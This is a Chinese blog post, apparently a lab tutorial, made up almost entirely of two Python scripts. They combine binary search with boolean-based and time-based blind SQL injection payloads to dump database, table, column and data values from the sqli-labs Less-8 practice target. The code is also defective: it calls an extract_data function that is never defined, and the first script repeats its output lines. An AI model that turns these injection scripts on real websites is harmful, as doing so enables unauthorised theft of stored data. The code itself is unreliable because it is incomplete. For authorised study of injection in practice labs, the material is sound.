利用二分法+布尔盲注、时间盲注进行sql注入

Ajiang4212025-02-14 21:11

一、布尔盲注:

python 复制代码 
import requests
 
def binary_search_character(url, query, index, low=32, high=127):
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND ASCII(SUBSTRING(({query}),{index},1)) >= {mid} -- "
        res = {"id": payload}
        r = requests.get(url, params=res)
 
        if "You are in.........." in r.text:
            low = mid
        else:
            high = mid - 1
 
    return chr(low) if low > 32 else ''
 
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
 
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
 
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
 
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
    print(f"数据库名: {database_name}")
    print(f"表名: {table_names}")
    print(f"列名: {column_names}")
    print(f"数据: {extracted_values}")

二、时间盲注:

python 复制代码 
import requests
import time
 
def binary_search_character(url, query, index, low=32, high=127):
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{index},1)) >= {mid}, SLEEP(2), 0) -- "
        res = {"id": payload}
        
        start_time = time.time()
        r = requests.get(url, params=res)
        response_time = time.time() - start_time
        
        if response_time > 1.5:  # 服务器延迟意味着条件成立
            low = mid
        else:
            high = mid - 1
 
    return chr(low) if low > 32 else ''
 
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
 
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
 
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
 
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
相关推荐
Le_ee19 分钟前
sqli-labs靶场第七关——文件导出注入
数据库·sql·网络安全·php·sql注入·sqli—labs
MZWeiei5 小时前
Spark SQL 运行架构详解(专业解释+番茄炒蛋例子解读)
大数据·分布式·sql·架构·spark
banzhenfei9 小时前
xp_cmdshell bcp 导出文件
java·数据库·sql
闪电麦坤9514 小时前
SQL:MySQL函数:条件函数(Conditional Functions)
数据库·sql·mysql
荔枝吻14 小时前
【抽丝剥茧知识讲解】引入mybtis-plus后,mapper实现方式
java·sql·mybatis
wangcheng86991 天前
Oracle常用函数-日期时间类型
数据库·sql·oracle
不务专业的程序员--阿飞1 天前
【SQL 如何解锁递归】
java·数据库·sql
Always_away1 天前
数据库系统概论|第七章:数据库设计—课程笔记
数据库·笔记·sql·学习
闪电麦坤952 天前
思路解析:第一性原理解 SQL
服务器·数据库·sql
热门推荐
01YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】02KGG转MP3工具|非KGM文件|解密音频03从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05Coze扣子平台完整体验和实践(附国内和国际版对比)06DeepSeek各版本说明与优缺点分析07【解决】Android Gradle Sync 报错 Could not read workspace metadata08YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU09苍穹外卖面试总结10组基轨迹建模 GBTM的介绍与实现(Stata 或 R)